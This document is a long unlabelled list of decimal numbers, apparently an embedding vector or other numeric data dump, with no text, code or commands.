0.0008790661813691258, -0.0320570282638073, 0.02909274585545063, 0.02090277150273323, -0.03755775839090347, 0.05861332640051842, -0.018274644389748573, -0.02111668884754181, -0.016242431476712227, -0.0016282540746033192, 0.018839998170733452, 0.0252727959305048, 0.00505379494279623, -0.010925059206783772, 0.009213721379637718, 0.014103258959949017, 0.01660914719104767, -0.05112622305750847, 0.03801615163683891, -0.015279803425073624, -0.022079316899180412, -0.005787225440144539, -0.008755327202379704, -0.03489907085895538, 0.018152406439185143, 0.024768561124801636, 0.012712796218693256, 0.005431970115751028, -0.01559303980320692, 0.0570547878742218, -0.01803016848862171, -0.029276104643940926, -0.00976379495114088, 0.04464758560061455, -0.0126363979652524, -0.016334110870957375, -0.0019309851340949535, 0.0267702154815197, 0.0005281082121655345, 0.022109875455498695, -0.03535746410489082, -0.04305848851799965, 0.05873556435108185, 0.07022597640752792, -0.010810460895299911, 0.0010151519672945142, 0.02736612781882286, 0.01926783286035061, 0.038963500410318375, 0.022721068933606148, -0.02458520419895649, -0.0035754740238189697, -0.013805302791297436, -0.0014305716613307595, 0.002866873051971197, 0.0431501641869545, -0.018992796540260315, -0.009901313111186028, 0.06209712103009224, -0.004740559030324221, 0.016456348821520805, -0.030651286244392395, -0.01615075208246708, 0.007418344728648663, 0.004645060282200575, -0.003103710012510419, 0.00272935489192605, -0.06717001646757126, 0.03220982477068901, -0.05589352175593376, 0.013232310302555561, 0.00033114198595285416, -0.046817317605018616, -0.049842718988657, 0.0140879787504673, -0.049934398382902145, 0.01916087418794632, 0.0627083107829094, -0.03560194373130798, 0.0167313851416111, 0.057085346430540085, -0.006371678318828344, 0.04079707711935043, -0.0021907419431954622, -0.022537710145115852, -0.02874131128191948, 0.018503842875361443, -0.026006225496530533, -0.029046906158328056, -0.013820582069456577, 0.0339822843670845, -0.00550836930051446, -0.020474936813116074, 0.010008271783590317, -0.041836101561784744, 0.006635254714637995, 0.030865203589200974, 0.03407396376132965, 0.027518926188349724, 0.001181319821625948, 0.03679376840591431, 0.00545107014477253, 0.015218684449791908, 0.012101604603230953, -0.042416736483573914, -0.02285858616232872, -0.03868846222758293, -0.0327598974108696, -0.010061751119792461, -0.0009836374083533883, 0.05815493315458298, 0.020367978140711784, -0.0027178949676454067, -0.0026300360914319754, 0.02702997252345085, 0.010023551061749458, -0.010772261768579483, -0.0009745649877004325, 0.023179462179541588, 0.001421976718120277, 0.029230264946818352, 0.020154060795903206, -0.006719293538480997, 0.018198246136307716, -0.03444067761301994, 0.03673264756798744, -0.04990383982658386, -0.009672115556895733, -0.04140826687216759, 0.012093964964151382, 0.0364576131105423, -0.01120773609727621, -0.008182334713637829, -0.001011332031339407, 0.013996300287544727, -0.048987049609422684, 0.002876423066481948, 0.013071872293949127, 0.012628757394850254, 0.016318829730153084, -0.0177856907248497, -0.031873669475317, -0.028680192306637764, -0.00551600893959403, -0.00969503540545702, -0.017128659412264824, 0.04651172086596489, -0.010520144365727901, -0.018564961850643158, -0.04211113974452019, -0.016441069543361664, -0.006291459314525127, 0.019206713885068893, 0.043914154171943665, -0.0005309731932356954, -0.030085932463407516, 0.009886032901704311, -0.002385559258982539, -0.007116568740457296, 0.008801166899502277, 0.005156933795660734, -0.028466274961829185, -0.030880482867360115, 0.022247394546866417, -0.009633916430175304, -0.002809573896229267, 0.010978538542985916, -0.004992675967514515, 0.009840193204581738, 0.005294451955705881, 0.00958043709397316, -0.0036136736162006855, -0.026189584285020828, -0.006356398109346628, -0.029963694512844086, 0.005011775530874729, -0.017755132168531418, 0.01547844149172306, 0.015890995040535927, 0.017403695732355118, -0.010604184120893478, 0.01275099627673626, 0.006474816706031561, -0.012040485627949238, -0.020352698862552643, -0.018442723900079727, 0.02504359744489193, 0.037007685750722885, 0.008060096763074398, -0.01729673705995083, 0.02021517977118492, -0.018427442759275436, -0.002767554484307766, 0.03404340147972107, 0.0003287545114289969, -0.008304573595523834, 0.0029356323648244143, -0.00848793052136898, 0.001188004738651216, 0.0038505105767399073, 0.011796008795499802, -0.009947151876986027, 0.041836101561784744, -0.02887882851064205, -0.019772065803408623, 0.005286811850965023, -0.015570119954645634, -0.013033672235906124, -0.02942890115082264, -0.020474936813116074, -0.022446030750870705, -0.012200923636555672, -0.022094596177339554, 0.04840641841292381, -0.004091167356818914, -0.01569235883653164, 0.010756981559097767, -0.0021047929767519236, 0.0065855951979756355, 0.005561848636716604, 0.03893293812870979, -0.011154256761074066, 0.002456228481605649, 0.033401649445295334, 0.005122554022818804, -0.02701469324529171, -0.024890800938010216, -0.007147128228098154, 0.019451189786195755, -0.010420826263725758, 0.026235422119498253, -0.009542237035930157, 0.031873669475317, -0.012086324393749237, -0.004343284294009209, -0.025822868570685387, 0.024401847273111343, -0.022705787792801857, 0.003374926745891571, -0.02145284414291382, 0.008449731394648552, -0.014340096153318882, 0.005875084549188614, -0.01871776022017002, 0.007830899208784103, -0.0071280281990766525, -0.025945106521248817, 0.017281457781791687, 0.02204875648021698, 0.010428465902805328, 0.006406057626008987, 0.01581459678709507, 0.0013073781738057733, -0.021788999438285828, 0.007212067488580942, -0.00104666652623564, 0.03581586107611656, 0.024676883593201637, -0.012147444300353527, -0.0073304856196045876, -0.007181507535278797, 0.003938369452953339, 0.007559682708233595, -0.0627083107829094, -0.006887371651828289, -0.001701788161881268, -0.020031822845339775, 0.011001458391547203, 0.008465011604130268, 0.0035200847778469324, -0.014065058901906013, 0.04605332762002945, -0.010069390758872032, -0.012453040108084679, 0.013705983757972717, 0.018519122153520584, -0.008388612419366837, -0.016364669427275658, -0.005237152799963951, 0.017495375126600266, -0.007490923628211021, 0.02576174959540367, -0.0006193095468915999, -0.014172017574310303, -0.014920728281140327, -0.006360218394547701, 0.015287443995475769, -0.01582987606525421, -0.007074548862874508, 0.031247198581695557, -0.02654101885855198, -0.01379002258181572, 0.03071240521967411, 0.033646129071712494, -0.015249243937432766, -0.032270945608615875, 0.027182770892977715, -0.00268351542763412, 0.0017008330905809999, -0.009015084244310856, 0.014301896095275879, 0.009886032901704311, 0.012453040108084679, -0.00958807673305273, 0.00865600910037756, 0.007884378544986248, 0.015646519139409065, 0.062402717769145966, -0.01641050912439823, -0.008709488436579704, 0.010451385751366615, -0.00290316273458302, -0.010672942735254765, 0.01709810085594654, 0.0218348391354084, 0.03529634699225426, -0.05360155180096626, 0.01697586104273796, -0.04709235578775406, 0.00683771213516593, 0.04052203893661499, -0.014515813440084457, -0.014836689457297325, -0.004858977627009153, -0.015784036368131638, -0.011750169098377228, 0.012009925208985806, -0.005829245317727327, -0.022537710145115852, -0.029016347602009773, -0.024172648787498474, 0.0177856907248497, -0.007620802149176598, 0.000831316807307303, -0.02495191991329193, -0.03000953420996666, -0.0025631871540099382, -0.023286420851945877, 0.020948611199855804, -0.011528612114489079, 0.006482456810772419, 0.0032698779832571745, 0.023255860432982445, -0.019909584894776344, 0.009549877606332302, -0.0004173296329099685, -0.018488561734557152, 0.013912261463701725, 0.02932194247841835, 0.0162882711738348, -0.016945302486419678, 0.04272232949733734, 0.039207976311445236, -0.009015084244310856, -0.006803332362323999, 0.014851968735456467, 0.022721068933606148, 0.014966567978262901, -0.038749583065509796, 0.0025383573956787586, 0.040674835443496704, -0.005153113976120949, 0.002885972848162055, 0.0066658142022788525, 0.04476982355117798, -0.0003593141445890069, -0.015233964659273624, 0.010879220440983772, -0.00980963371694088, -0.003787481226027012, -0.014256056398153305, 0.022461311891674995, -0.01061946339905262, 0.0025536371394991875, -0.019772065803408623, 0.008197614923119545, 0.011658490635454655, 0.012827395461499691, 0.01061182375997305, -0.002007384318858385, -0.0007568277651444077, 0.024279607459902763, 0.004106447100639343, 0.005775765981525183, -0.043577998876571655, 0.008167055435478687, -0.007815619930624962, 0.021315326914191246, 0.039880286902189255, -0.018488561734557152, 0.01466861180961132, 0.005649707280099392, 0.02356145717203617, -0.022002916783094406, -0.017357856035232544, -0.06069137901067734, -0.006364038214087486, -0.010367346927523613, -0.010894499719142914, -0.011780728586018085, 0.02181955985724926, 0.002343539847061038, 0.017113380134105682, -0.02308778278529644, 0.006688734050840139, 0.018152406439185143, 0.003968928940594196, -0.0064939167350530624, 0.01699114218354225, -0.030422089621424675, -0.022690508514642715, -0.035724181681871414, -0.005974403116852045, -0.024860240519046783, 0.00046675026533193886, 0.025471432134509087, -0.005775765981525183, 0.0006193095468915999, -0.025119997560977936, 0.0035391845740377903, -0.0039536491967737675, 0.03783279284834862, 0.03150695562362671, 0.006142481230199337, 0.008533770218491554, -0.031445834785699844, -0.031934790313243866, 0.016761943697929382, 0.013736543245613575, -0.016807783395051956, 0.014653331600129604, -0.017403695732355118, 0.004003308713436127, 0.013728903606534004, 0.01154389139264822, -0.03266822174191475, -0.014981847256422043, -0.029978975653648376, -0.022598829120397568, -0.005607687868177891, -0.013759463094174862, -0.018045447766780853, 0.014187297783792019, -0.025349194183945656, -0.013889341615140438, 0.008808806538581848, 0.01264403760433197, -0.023515617474913597, -0.04006364569067955, 0.004316544625908136, 0.031476397067308426, 0.009190801531076431, -0.011902967467904091, 0.0031571893487125635, -0.008740047924220562, 0.0029929315205663443, 0.030284570530056953, -0.012491239234805107, 0.0046412404626607895, 0.0007716300897300243, -0.007659001741558313, -0.01466861180961132, -0.007403064984828234, 0.010008271783590317, -0.03150695562362671, 0.011734888888895512, 0.008197614923119545, -0.027671724557876587, -0.049842718988657, 0.01246831938624382, 0.025883987545967102, -0.004874257370829582, 0.007567322812974453, 0.00019266876915935427, -0.0014916908694431186, -0.018885837867856026, 0.008014257065951824, -0.04064427688717842, 0.023347539827227592, -0.00232444005087018, -0.026357661932706833, 0.049139849841594696, 0.01356846559792757, -0.006306739058345556, -0.006448077037930489, -0.0026930654421448708, -0.026464620605111122, 0.03395172208547592, -0.06243327632546425, 0.013843501918017864, -0.011009098961949348, 0.02145284414291382, 0.028542673215270042, -0.020154060795903206, -0.011368174105882645, 0.011559171602129936, 0.014210217632353306, 0.006692553870379925, -0.029978975653648376, -0.06350286304950714, 0.014034499414265156, -0.04256953299045563, -0.02076525241136551, -0.007166227791458368, 0.02816067822277546, -0.013553185388445854, -0.021544523537158966, 0.02505887858569622, 0.01327050942927599, -0.002588016679510474, -0.009167882613837719, 0.013599025085568428, -0.022812746465206146, -0.02724388986825943, 0.014760290272533894, -0.044403109699487686, 0.03755775839090347, -0.013774743303656578, -0.0167313851416111, -0.005282992031425238, -0.029276104643940926, -0.01847328245639801, 0.033646129071712494, 0.0013178830267861485, 0.023118343204259872, -0.0072388071566820145, 0.02437128685414791, -0.027289729565382004, 0.008732407353818417, -0.023255860432982445, 0.01731201820075512, 0.0011211555683985353, -0.004201945848762989, -0.005875084549188614, -0.0026796956080943346, -0.02793148159980774, -0.0029299024026840925, -0.01298019289970398, -0.015165205113589764, 0.0015671348664909601, -0.015967395156621933, 0.003728272160515189, -0.02722861059010029, 0.0020341237541288137, 0.0009134457795880735, 0.008289293386042118, 0.001621569157578051, 0.0399719662964344, 0.0032832478173077106, -0.02079581283032894, 0.01882471889257431, -0.003781751496717334, 0.012369001284241676, 0.002813393948599696, -0.025822868570685387, 0.008839366026222706, 0.008014257065951824, -0.05069838836789131, -0.012598197907209396, 0.011475132778286934, -0.013461506925523281, -0.0019672748167067766, -0.03636593371629715, -0.005370851140469313, 0.0044158631935715675, -0.027641164138913155, -0.03428788110613823, 0.006367858033627272, -0.012246762402355671, -0.034348998218774796, 0.018335765227675438, -0.005057615227997303, -0.0025689168833196163, -0.00865600910037756, -0.010634743608534336, 0.007616982329636812, 0.0002136785042239353, -0.015165205113589764, 0.0037779314443469048, 0.030299849808216095, -0.036427050828933716, -0.013018392957746983, -0.004297444596886635, 0.0020092942286282778, -0.003120899898931384, 0.03847454488277435, 0.0011574451345950365, -0.01917615346610546, 0.030544327571988106, -0.029169145971536636, 0.0371604822576046, -0.04119434952735901, -0.02596038579940796, -0.002121982630342245, -0.017953768372535706, -0.008121215738356113, 0.01061946339905262, 0.006860631983727217, -0.000026038336727651767, 0.0028974327724426985, -0.020245740190148354, 0.011169536039233208, 0.006402237806469202, -0.021101409569382668, -0.02310306392610073, -0.024325447157025337, 0.003976569045335054, 0.005989682860672474, -0.030498487874865532, -0.01916087418794632, -0.018152406439185143, -0.00906092394143343, -0.00917552225291729, 0.022232113406062126, 0.036182574927806854, -0.020031822845339775, 0.0019921043422073126, -0.014874888584017754, 0.02400457113981247, -0.007876738905906677, -0.022919705137610435, -0.03444067761301994, -0.004297444596886635, -0.018671920523047447, 0.009557517245411873, 0.02446296624839306, 0.003785571316257119, 0.0021678220946341753, -0.009710315614938736, 0.006146301049739122, -0.021300045773386955, 0.01084102038294077, 0.020490216091275215, 0.008067736402153969, -0.0266785379499197, 0.019115034490823746, 0.020856931805610657, -0.012361360713839531, -0.027534205466508865, 0.024096250534057617, 0.0008083971333689988, -0.00038342757034115493, -0.017006421461701393, -0.04049148038029671, -0.02273634821176529, -0.0023511797189712524, -0.010573623701930046, -0.02910802513360977, -0.020841652527451515, 0.0007214932120405138, 0.011039658449590206, -0.0249213594943285, -0.028450993821024895, 0.0024485886096954346, 0.01905391551554203, -0.007601702120155096, 0.008938685059547424, -0.009374159388244152, -0.004908637143671513, -0.022537710145115852, 0.000664671475533396, -0.030544327571988106, 0.009710315614938736, -0.0012223842786625028, -0.009618636220693588, 0.011490412056446075, -0.028206517919898033, -0.009313040412962437, 0.009549877606332302, 0.02780924178659916, 0.036274254322052, 0.0004786876088473946, -0.011261215433478355, -0.02783980220556259, -0.03578529879450798, -0.0004942061495967209, -0.023408658802509308, 0.03315717354416847, -0.0014725910732522607, 0.009786713868379593, -0.012521798722445965, 0.007998976856470108, 0.01252943929284811, -0.01287323422729969, -0.011681409552693367, -0.011994645930826664, 0.021147247403860092, 0.006562675815075636, -0.02400457113981247, 0.039758048951625824, 0.011711969040334225, 0.016716105863451958, -0.001893740613013506, -0.03379892557859421, -0.029398342594504356, -0.030177611857652664, -0.011979365721344948, 0.00036265660310164094, -0.005989682860672474, -0.001949129975400865, 0.03159863501787186, 0.002796204062178731, 0.008816447108983994, -0.02435600757598877, 0.007937857881188393, -0.012689877301454544, -0.018213525414466858, 0.011520971544086933, -0.0033329071011394262, -0.005619147792458534, 0.025456152856349945, -0.031124960631132126, -0.00066801393404603, 0.017021700739860535, -0.005302092060446739, -0.020337417721748352, -0.002211751649156213, 0.006497736554592848, -0.020108221098780632, 0.008801166899502277, 0.019588708877563477, -0.03230150416493416, 0.0002315845194971189, 0.01264403760433197, 0.02053605578839779, -0.0005834975163452327, 0.004572481382638216, 0.01068822294473648, -0.0026013865135610104, -0.0008146045147441328, -0.015890995040535927, -0.001319793052971363, -0.050056636333465576, -0.03685488551855087, 0.00331953726708889, 0.01471445057541132, 0.007907298393547535, 0.006516836117953062, -0.028817709535360336, 0.002215571468695998, -0.0072731864638626575, -0.008380971848964691, 0.030773524194955826, 0.01022218819707632, -0.009672115556895733, 0.002488698111847043, -0.011796008795499802, 0.06863687932491302, 0.013285789638757706, -0.010138149373233318, -0.01212452445179224, -0.006883551366627216, 0.012422480620443821, 0.01408033911138773, 0.023011384531855583, -0.011520971544086933, -0.037343841046094894, 0.008755327202379704, -0.015493720769882202, -0.041622184216976166, -0.00534411147236824, -0.008037176914513111, 0.007437444292008877, -0.013560825958848, -0.002206021687015891, 0.007937857881188393, -0.0031953889410942793, -0.0011116056703031063, 0.0010896410094574094, 0.0005987773183733225, 0.009977711364626884, 0.006142481230199337, -0.02146812342107296, -0.004874257370829582, -0.011643210425972939, -0.014141458086669445, -0.026754936203360558, -0.002777104265987873, -0.005023235455155373, -0.04788690432906151, 0.007192967459559441, 0.014660971239209175, 0.0007405930082313716, 0.014592212624847889, -0.014836689457297325, -0.02180428057909012, -0.009412359446287155, 0.0032183085568249226, -0.026693817228078842, -0.021636201068758965, -0.004988855682313442, 0.004683259874582291, 0.07719356566667557, 0.0036576029378920794, -0.0071280281990766525, -0.00011006233398802578, -0.0357547402381897, -0.02622014284133911, 0.0003688640135806054, -0.007074548862874508, 0.026052065193653107, -0.006249439902603626, 0.003949829377233982, -0.008434451185166836, 0.023683695122599602, -0.017006421461701393, -0.002083783270791173, -0.01789264939725399, 0.01916087418794632, 0.006046982482075691, -0.006001142784953117, 0.030223451554775238, 0.016716105863451958, 0.02411152981221676, 0.015218684449791908, -0.015463161282241344, 0.014561653137207031, -0.04330296441912651, -0.02125420607626438, -0.004801678471267223, 0.016807783395051956, -0.005355571396648884, -0.014745010063052177, -0.0011087408056482673, -0.01430953573435545, 0.0006995284929871559, 0.018182966858148575, -0.004744378849864006, 0.024401847273111343, -0.008090656250715256, 0.004660340026021004, -0.019802626222372055, -0.006719293538480997, -0.004889537114650011, 0.00580632546916604, 0.013767102733254433, -0.014951287768781185, -0.014355375431478024, 0.03379892557859421, 0.027121651917696, 0.025807587429881096, -0.014760290272533894, 0.00917552225291729, -0.005718466360121965, 0.007338125724345446, 0.01974150538444519, 0.009213721379637718, 0.029841456562280655, 0.019237272441387177, 0.009557517245411873, 0.017113380134105682, -0.0008189019863493741, 0.018427442759275436, 0.014638052321970463, 0.022568270564079285, 0.040827635675668716, 0.018442723900079727, -0.014042139984667301, -0.02366841584444046, 0.023989291861653328, -0.006035522557795048, -0.005894184112548828, -0.0054357899352908134, 0.00488189747557044, 0.009068563580513, -0.01217036321759224, 0.012132164090871811, 0.030162332579493523, -0.03761887550354004, -0.003073150524869561, 0.017953768372535706, -0.0011326154926791787, 0.014943648129701614, 0.010955619625747204, -0.01706754043698311, -0.0016397138824686408, -0.01559303980320692, -0.0006479591829702258, -0.012223842553794384, -0.005084354430437088, 0.012819754891097546, -0.006830072030425072, 0.001008467050269246, 0.0012901884038001299, -0.00015064931358210742, 0.00019398187578190118, 0.001659768633544445, -0.0022423111367970705, 0.01699114218354225, 0.005653527565300465, -0.0034627853892743587, -0.010168708860874176, 0.014943648129701614, 0.010245108045637608, 0.025700630620121956, 0.007021069992333651, -0.005875084549188614, 0.011566811241209507, -0.0069561307318508625, 0.022583549842238426, 0.016593866050243378, -0.007838538847863674, -0.027152210474014282, -0.04373079910874367, 0.009794354438781738, -0.027564765885472298, -0.007219707127660513, 0.0032736980356276035, 0.006192140281200409, -0.0032469583675265312, 0.014347735792398453, -0.012430120259523392, -0.03413508087396622, 0.008037176914513111, -0.00560004822909832, 0.0016817334108054638, -0.007899658754467964, 0.004179026465862989, -0.023974012583494186, -0.042538974434137344, 0.036518730223178864, 0.017342576757073402, 0.029841456562280655, 0.008182334713637829, 0.010061751119792461, 0.002018844010308385, 0.0415610671043396, -0.005535108968615532, -0.0016903282376006246, 0.008854646235704422, -0.009038004092872143, 0.017281457781791687, -0.017480095848441124, 0.032607100903987885, 0.008579609915614128, 0.01149805262684822, 0.009908952750265598, 0.004305084701627493, -0.017174499109387398, 0.0037091723643243313, 0.01616603136062622, 0.008067736402153969, -0.006195960566401482, -0.01663970574736595, 0.01651746779680252, 0.013209390453994274, 0.018442723900079727, 0.01799960806965828, 0.030636006966233253, -0.025670070201158524, -0.021636201068758965, -0.008335133083164692, -0.008495571091771126, 0.021529244258999825, 0.015371482819318771, 0.0014143368462100625, 0.010535424575209618, 0.01605907455086708, -0.002607116475701332, -0.022094596177339554, -0.03529634699225426, -0.014683891087770462, 0.017724571749567986, 0.009970071725547314, -0.02168204076588154, 0.022766906768083572, 0.013912261463701725, 0.010077030397951603, -0.026036785915493965, -0.005359391216188669, -0.0000658941498841159, -0.009152602404356003, -0.00152129540219903, 0.031568072736263275, -0.012743356637656689, -0.020031822845339775, 0.035724181681871414, -0.014355375431478024, 0.009954792447388172, -0.013828222639858723, -0.03266822174191475, 0.02240019291639328, 0.00022907767561264336, 0.030498487874865532, -0.004236325621604919, -0.017709292471408844, -0.018641360104084015, -0.002427578903734684, -0.0011774998856708407, 0.024860240519046783, -0.02322530187666416, -0.022430751472711563, -0.00976379495114088, -0.003309987485408783, 0.005057615227997303, -0.008350412361323833, 0.0031419096048921347, -0.010871579870581627, -0.012254402972757816, -0.009213721379637718, -0.020123502239584923, -0.009610996581614017, -0.0007310431101359427, -0.005305911879986525, 0.0028936127200722694, -0.002282420638948679, 0.028481554239988327, -0.015081166289746761, 0.019237272441387177, -0.01754121482372284, 0.020383257418870926, 0.02586870826780796, -0.0012414840748533607, 0.009572796523571014, -0.0014038319932296872, -0.009007444605231285, -0.0011564901797100902, -0.01722033880650997, 0.016196591779589653, 0.010168708860874176, -0.015172844752669334, 0.00560004822909832, 0.016456348821520805, 0.0046412404626607895, 0.008724767714738846, -0.006184500642120838, -0.007024889811873436, 0.011627930216491222, 0.004423503298312426, 0.0001224771694978699, 0.010665303096175194, -0.03254598006606102, 0.00687209190800786, -0.010558344423770905, -0.0033329071011394262, 0.020612455904483795, -0.00848793052136898, -0.0002130816428689286, -0.0094658387824893, 0.028542673215270042, -0.005321191623806953, 0.022109875455498695, 0.010038831271231174, 0.014447053894400597, 0.020581895485520363, -0.0007706750766374171, 0.0013665874721482396, 0.024203209206461906, -0.01466861180961132, -0.00379512133076787, 0.020383257418870926, -0.014057419262826443, 0.000256891711615026, -0.019115034490823746, -0.026235422119498253, 0.009335960261523724, -0.017831530421972275, 0.004003308713436127, -0.005584768019616604, 0.019420631229877472, -0.00018968443328049034, 0.0167313851416111, -0.0010877309832721949, 0.007471824064850807, 0.016196591779589653, 0.015325643122196198, -0.02423376776278019, -0.002687335480004549, 0.004927736707031727, -0.015997953712940216, -0.014164377935230732, -0.001287323422729969, 0.006761312950402498, 0.016700824722647667, -0.006142481230199337, -0.02159036323428154, -0.009114403277635574, 0.01618131250143051, -0.007372505031526089, -0.02573118917644024, -0.01764817349612713, 0.004263065289705992, -0.002933722222223878, 0.032943256199359894, -0.00268351542763412, -0.02111668884754181, 0.012101604603230953, -0.02747308649122715, -0.025715909898281097, 0.030972162261605263, -0.012498879805207253, -0.01777041144669056, 0.029184425249695778, 0.013728903606534004, 0.039085738360881805, 0.0016960581997409463, -0.007406884804368019, -0.00036385032581165433, 0.002786654280498624, 0.013621944934129715, 0.03703824430704117, -0.0060660820454359055, 0.01799960806965828, -0.005875084549188614, -0.010527784936130047, -0.01683834381401539, 0.010321507230401039, 0.027289729565382004, -0.0011259305756539106, -0.0026185763999819756, 0.0063029187731444836, -0.0222779531031847, 0.0036365932319313288, 0.011711969040334225, 0.007502383552491665, -0.04003308713436127, 0.01720505952835083, -0.00987839326262474, 0.03190423175692558, 0.004820778034627438, -0.03725216165184975, 0.003808491164818406, 0.01206340454518795, 0.009267200715839863, 0.026296542957425117, 0.0016043793875724077, 0.011551531963050365, -0.026938293129205704, 0.004778758622705936, -0.002796204062178731, 0.0014506264124065638, -0.010474305599927902, -0.023943452164530754, 0.01437829528003931, -0.010672942735254765, -0.0037970312405377626, 0.0016435339348390698, -0.0049812160432338715, 0.004965936299413443, 0.004274525213986635, -0.007189147640019655, 0.01130705513060093, 0.0019462649943307042, -0.0017438075738027692, -0.033646129071712494, 0.016196591779589653, -0.0016674086218699813, 0.015096445567905903, 0.005554208531975746, 0.0113146947696805, 0.011467492207884789, -0.028939947485923767, -0.009496398270130157, -0.002931812312453985, 0.011757808737456799, -0.011299414560198784, -0.02181955985724926, 0.009274840354919434, -0.007437444292008877, -0.010168708860874176, 0.02551727183163166, -0.010970898903906345, -0.04776466637849808, -0.02782452292740345, -0.02874131128191948, -0.003073150524869561, -0.016792504116892815, 0.009908952750265598, 0.03847454488277435, -0.001165085006505251, -0.021040288731455803, 0.024264328181743622, 0.0074985637329518795, -0.008610169403254986, 0.0025689168833196163, -0.007483283989131451, -0.011223015375435352, 0.011505692265927792, -0.004687079694122076, 0.013362187892198563, -0.017739852890372276, -0.01974150538444519, 0.007544402964413166, -0.021620921790599823, -0.02275162748992443, 0.015768757089972496, -0.010115230455994606, 0.02353089675307274, 0.006215060129761696, 0.008350412361323833, -0.020597174763679504, -0.015371482819318771, 0.001008467050269246, 0.012941993772983551, -0.02356145717203617, 0.013499706983566284, 0.009106762707233429, 0.003942189272493124, -0.02203347720205784, -0.01430953573435545, 0.01868719980120659, -0.007456544321030378, 0.018045447766780853, -0.014683891087770462, 0.026067344471812248, -0.002981471596285701, -0.02299610525369644, 0.003672882914543152, 0.006054622121155262, -0.028145398944616318, -0.01650218851864338, 0.005527468863874674, 0.0027121652383357286, 0.00008015928324311972, -0.02125420607626438, -0.04538101702928543, 0.00672311382368207, -0.007788879796862602, 0.021727880463004112, -0.029001066461205482, 0.010000631213188171, 0.03737439960241318, 0.005233332980424166, 0.02585342712700367, 0.026938293129205704, 0.0029203523881733418, -0.016777224838733673, -0.03153751417994499, 0.016700824722647667, 0.022828025743365288, 0.009442918933928013, -0.021407004445791245, -0.011077857576310635, -0.0020856931805610657, -0.019772065803408623, 0.018519122153520584, -0.006566495634615421, -0.007456544321030378, 0.013209390453994274, 0.00764754181727767, 0.007433624472469091, -0.0163799487054348, 0.0222779531031847, -0.0018746409332379699, 0.007223526947200298, 0.016334110870957375, -0.004671799950301647, -0.012582918629050255, 0.002272870857268572, 0.014676251448690891, -0.004675619769841433, 0.0036079436540603638, 0.009366519749164581, -0.012567638419568539, -0.0065282960422337055, 0.00010134807234862819, 0.020337417721748352, 0.01079518161714077, 0.006348758470267057, -0.02157508209347725, 0.002687335480004549, -0.027793962508440018, 0.00888520572334528, 0.005198953207582235, 0.000053061507060192525, -0.02782452292740345, 0.0063831377774477005, -0.002578466897830367, -0.015096445567905903, -0.007540583144873381, -0.0008981659775599837, 0.024967199191451073, 0.014126178808510303, 0.022002916783094406, -0.007403064984828234, 0.006726933643221855, -0.001027566846460104, 0.0003793688665609807, 0.0008150820503942668, 0.03560194373130798, 0.0009836374083533883, 0.009343599900603294, -0.019069194793701172, -0.003214488737285137, -0.013285789638757706, 0.007624621968716383, 0.0007210157345980406, 0.024539364501833916, 0.008037176914513111, 0.030727684497833252, 0.02849683351814747, 0.012766275554895401, -0.015722917392849922, -0.0035162647254765034, 0.008350412361323833, -0.01822880655527115, 0.0140879787504673, -0.002305340487509966, -0.020169340074062347, 0.012651677243411541, 0.021055569872260094, -0.012483599595725536, 0.014851968735456467, -0.008839366026222706, 0.011475132778286934, 0.01754121482372284, 0.01149805262684822, 0.0051263743080198765, 0.0060431621968746185, -0.012743356637656689, 0.0003213533782400191, -0.0032736980356276035, 0.006826252210885286, 0.00617686053737998, 0.018076008185744286, -0.027152210474014282, 0.0037416419945657253, -0.008159414865076542, -0.012208563275635242, 0.014439414255321026, -0.01345386728644371, -0.002574646845459938, 0.0099929915741086, -0.00735722528770566, -0.013499706983566284, -0.01602851413190365, 0.02088749222457409, -0.004121726844459772, -0.00042258205940015614, 0.003432225901633501, 0.000058284094848204404, -0.020398538559675217, 0.007319026160985231, -0.011811288073658943, 0.01686890237033367, 0.0010877309832721949, -0.007349585648626089, 0.004033868201076984, -0.008212894201278687, -0.015661798417568207, -0.0022232113406062126, 0.016563307493925095, -0.003739731851965189, -0.009144962765276432, -0.013301068916916847, -0.017755132168531418, 0.010818100534379482, 0.009526957757771015, -0.013438587076961994, -0.011406373232603073, -0.014836689457297325, -0.015623599290847778, -0.011261215433478355, 0.00918316189199686, 0.01264403760433197, 0.00199019443243742, 0.01559303980320692, 0.0018354863859713078, -0.006742213387042284, 0.009076203219592571, 0.0014916908694431186, -0.01975678652524948, -0.0016674086218699813, -0.007922578603029251, -0.020979169756174088, 0.001322658034041524, -0.00658177537843585, 0.027549486607313156, -0.005477809812873602, 0.0005916149239055812, 0.01870247907936573, -0.019252551719546318, 0.028344035148620605, 0.0035200847778469324, -0.015394401736557484, -0.018396884202957153, 0.016120193526148796, -0.016074353829026222, 0.0034914351999759674, -0.011123697273433208, -0.0339822843670845, -0.021850118413567543, 0.008992164395749569, 0.00969503540545702, -0.02123892679810524, 0.009534597396850586, -0.013866421766579151, -0.0159368347376585, -0.004389123525470495, 0.0015384851722046733, 0.003248868277296424, 0.008465011604130268, -0.00580632546916604, 0.006654354277998209, -0.0034093062859028578, 0.00848793052136898, -0.007838538847863674, 0.004690899513661861, 0.05179853364825249, -0.0006255169864743948, -0.03881070017814636, -0.0023187100887298584, 0.009206081740558147, -0.009779074229300022, 0.002484878059476614, 0.007063089404255152, 0.010023551061749458, 0.014813769608736038, 0.01755649410188198, 0.018870556727051735, -0.023714255541563034, -0.01275099627673626, -0.010642383247613907, 0.023255860432982445, 0.006746033206582069, -0.0037645616102963686, 0.013079511933028698, -0.011276494711637497, 0.018442723900079727, -0.025471432134509087, 0.0008590114885009825, -0.0049964957870543, 0.02030685916543007, 0.006765133235603571, 0.00837333220988512, 0.0024218489415943623, 0.0033023476134985685, 0.014393575489521027, 0.0020818733610212803, 0.012101604603230953, -0.006574135739356279, 0.0006298143998719752, 0.014745010063052177, 0.001306423218920827, -0.0068988315761089325, 0.017632894217967987, -0.00432800455018878, -0.009847833774983883, -0.004492262378334999, -0.013461506925523281, 0.010420826263725758, -0.011582091450691223, 0.01154389139264822, 0.019710946828126907, 0.01563887856900692, 0.0030196711886674166, -0.015394401736557484, -0.013316349126398563, -0.022476591169834137, -0.009099123068153858, 0.00877060741186142, 0.007105108816176653, 0.01234608143568039, -0.003075060434639454, 0.01787737011909485, 0.022247394546866417, 0.01344622764736414, 0.02401985041797161, -0.008541409857571125, -0.011589731089770794, 0.024310167878866196, -0.002588016679510474, -0.009626275859773159, 0.028894107788801193, 0.007953138090670109, 0.00493919663131237, 0.014851968735456467, -0.013110071420669556, -0.018259365111589432, 0.0032507781870663166, -0.01650218851864338, 0.004526641685515642, 0.010077030397951603, -0.010183989070355892, -0.00014265128993429244, -0.009435278363525867, -0.023958731442689896, -0.009381799027323723, 0.0005567578482441604, -0.019787345081567764, 0.016532747074961662, 